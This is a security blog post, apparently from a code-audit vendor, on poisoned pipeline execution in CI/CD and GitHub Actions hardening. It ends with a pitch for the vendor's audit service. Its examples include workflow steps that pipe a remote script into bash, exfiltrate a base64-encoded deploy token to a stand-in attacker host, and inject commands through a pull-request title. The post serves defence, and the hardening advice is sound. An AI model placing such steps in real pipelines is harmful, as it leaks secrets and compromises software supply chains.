Back to Blog
Security11 min

Your CI/CD Pipeline Is the Easiest Backdoor Into Production

Pipeline poisoning attacks exploit CI/CD configs to inject malicious code straight into production builds. Most teams never audit their pipeline definitions.

By Security TeamMarch 13, 2026

A fintech startup shipped malware to 40,000 users in 2024 because someone modified a GitHub Actions workflow file in a pull request. The PR looked normal. Changed two lines of CSS and added a run: curl step that downloaded a cryptominer into the build artifact. Nobody reviewed the workflow diff. The CI passed. It merged.

Took them eleven days to notice.

Why Pipeline Configs Get Zero Scrutiny

Development teams review application code obsessively. They'll argue about variable names for 45 minutes. But .github/workflows/deploy.yml? That file gets the same attention as a README update. Rubber-stamped and merged.

And attackers know this. SolarWinds didn't happen because their C# code was bad. The build system got compromised. CodeCov's bash uploader breach in 2021 affected thousands of downstream projects, including Twitch, because teams trusted their CI scripts implicitly. The pipeline IS the attack surface now. Not the code it builds.

A 2023 Aqua Security study found that 82% of organizations had at least one misconfigured CI/CD pipeline with excessive permissions. Not "could theoretically be exploited." Actively misconfigured. Running with admin tokens. Writing to production registries. Accessible from forked repositories.

Poisoned Pipeline Execution: The Three Flavors

Pipeline poisoning (PPE) comes in three variants, and most developers only think about the obvious one.

Direct PPE

Someone with write access modifies the pipeline definition directly. Changes the build script. Adds a step. Modifies an existing one to include malicious commands. You'd think this is rare because it requires repo access, but remember: most organizations give write access to way too many people. Contractors. Interns. That developer who left six months ago and whose access was never revoked.

# looks innocent enough in a big workflow file
- name: Setup environment
  run: |
    npm install
    curl -s https://evil.example.com/payload.sh | bash
    npm run build

Buried in a 200-line YAML file, that curl line disappears. Especially when the PR description says "fix: update build dependencies."

Indirect PPE

Nastier. The attacker doesn't touch the pipeline file at all. They modify a file that the pipeline consumes. A Makefile. A package.json postinstall script. A Dockerfile. The pipeline runs unchanged, but the inputs are poisoned.

// package.json - spot the problem
{
  "scripts": {
    "postinstall": "node scripts/setup.js && node scripts/telemetry.js",
    "build": "next build",
    "start": "next start"
  }
}

That telemetry.js file? Added in the same PR. "Added anonymous build telemetry" the description says. The actual content exfiltrates environment variables, which in CI usually include deployment tokens, API keys, and database credentials.

Public PPE (fork-based)

Anyone on GitHub can fork your public repo and submit a PR. If your workflow triggers on pull_request and the workflow file itself comes from the PR branch (not the base), an external attacker can run arbitrary code in your CI environment. Without ever having write access to your repo.

# DANGEROUS: uses workflow from the PR branch
on:
  pull_request:
    branches: [main]

# SAFER: pull_request_target uses workflow from base
on:
  pull_request_target:
    branches: [main]

But even pull_request_target isn't bulletproof. If you checkout the PR code and run it, you're back to square one. GitHub's own docs warn about this, buried three clicks deep in their security hardening guide.

Secrets in CI Are Basically Plaintext

Every CI platform masks secrets in logs. Great. Except there are about forty ways to exfiltrate them anyway.

# GitHub Actions "masks" secrets in logs, but...
- name: Totally normal step
  run: |
    # base64 encode to bypass log masking
    echo $DEPLOY_TOKEN | base64 | curl -d @- https://attacker.example.com/collect
  env:
    DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}

Log masking is string matching. Encode the secret differently and it sails right through. Or write it to a file and upload it as an artifact. Or use DNS exfiltration. Or just make an HTTP request. The CI runner has network access by default because it needs to pull dependencies and push builds.

CircleCI got breached in January 2023 and told every single customer to rotate all secrets stored in their platform. Every. Single. One. Because the assumption was that all secrets were compromised. That affected over a million developers.

GitHub Actions Specifically Is a Mess

Not picking on GitHub here. Well, maybe a little. But Actions has some footguns that other platforms handle better.

Third-party actions are just someone else's code running with your secrets. When you write uses: some-org/some-action@v3, you're trusting that org completely. Tags are mutable. The v3 tag can point to different code tomorrow. The tj-actions/changed-files incident in March 2025 proved this: a popular action got compromised and started dumping CI secrets to attacker-controlled logs. Thousands of repos affected. Pin to a commit SHA or accept the risk.

# Bad: mutable tag
- uses: actions/checkout@v4

# Better: pinned SHA
- uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1

# Best: pinned SHA + hash verification in a separate step

The GITHUB_TOKEN default permissions are too broad. Until recently, the default was read-write access to the repository contents, packages, and more. Now it defaults to read-only for forked repos, but for your own workflows it still has write access. Add permissions: blocks to every workflow or set the org-wide default to read-only.

Expression injection through issue titles and branch names.

# Vulnerable to injection
- name: Comment on PR
  run: |
    echo "Processing: ${{ github.event.pull_request.title }}"

# If PR title is: "; curl https://evil.example.com/steal?t=$GITHUB_TOKEN; echo "
# That runs as a shell command

Use an intermediate environment variable instead. Always. GitHub even has a CodeQL query for this (js/actions/command-injection) but barely anyone runs it on their workflow files.

What a Hardened Pipeline Actually Looks Like

The fix isn't one thing. It's layers. Some are easy. Some require changing how your team thinks about CI.

Require workflow approval for external contributors. GitHub has this setting. Turn it on. Every fork PR should require manual approval before any workflow runs. Yes, it's friction. The alternative is running arbitrary code from strangers.

Use OpenID Connect instead of long-lived secrets. AWS, GCP, and Azure all support OIDC tokens from GitHub Actions. Instead of storing an AWS_SECRET_ACCESS_KEY that lives forever, the CI gets a short-lived token scoped to exactly what it needs. If exfiltrated, it expires in minutes.

permissions:
  id-token: write  # needed for OIDC
  contents: read   # minimum needed

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502
        with:
          role-to-assume: arn:aws:iam::123456789:role/deploy-role
          aws-region: eu-west-1
          # no static credentials anywhere

Separate build and deploy pipelines. The build pipeline produces an artifact. A completely separate pipeline, triggered by artifact creation (not code push), handles deployment. Different permissions. Different secrets. A compromised build step can't touch production directly.

Sign your artifacts. Sigstore/cosign for containers. GPG for packages. If the build output isn't signed, you can't verify it wasn't tampered with between build and deploy. It takes 30 seconds to add to a pipeline and most teams don't bother.

Scanning Pipeline Configs Is Not Optional Anymore

You lint your JavaScript. You type-check your TypeScript. You run SAST on your application code. But your pipeline definitions? Those YAML files that control what runs in privileged environments with access to production secrets?

Nobody scans those.

Tools like Checkov and Semgrep have CI/CD rules now. GitHub's own security features can catch some of this. But the coverage is patchy and most rules focus on the obvious stuff. The subtle poisoning attacks, the indirect PPE through build scripts, the expression injection through user-controlled inputs, that requires understanding how the pipeline actually executes.

ScanMyCode.dev runs security audits that cover your CI/CD configuration alongside your application code. Pipeline misconfigurations, overly broad permissions, unpinned actions, secret exposure risks. You get the findings with exact file locations and remediation steps within 24 hours.

Stop Treating Pipeline Code as Infrastructure Boilerplate

Every YAML file in .github/workflows/ is production code. It runs with more privileges than your application. It has access to secrets your app never sees. And it executes automatically on events that external actors can trigger.

Review pipeline changes with the same rigor as application code. More, actually, because the blast radius is bigger. A bug in your app affects users. A compromised pipeline affects your entire software supply chain.

If you haven't audited your CI/CD configs recently, now is a good time. Submit your repo for a security audit and find out what's actually running in your pipelines before someone else does.

ci-cdpipeline-securitysupply-chaingithub-actionsdevops-security

Ready to improve your code?

Get an AI-powered code audit with actionable recommendations. Results in 24 hours.

Start Your Audit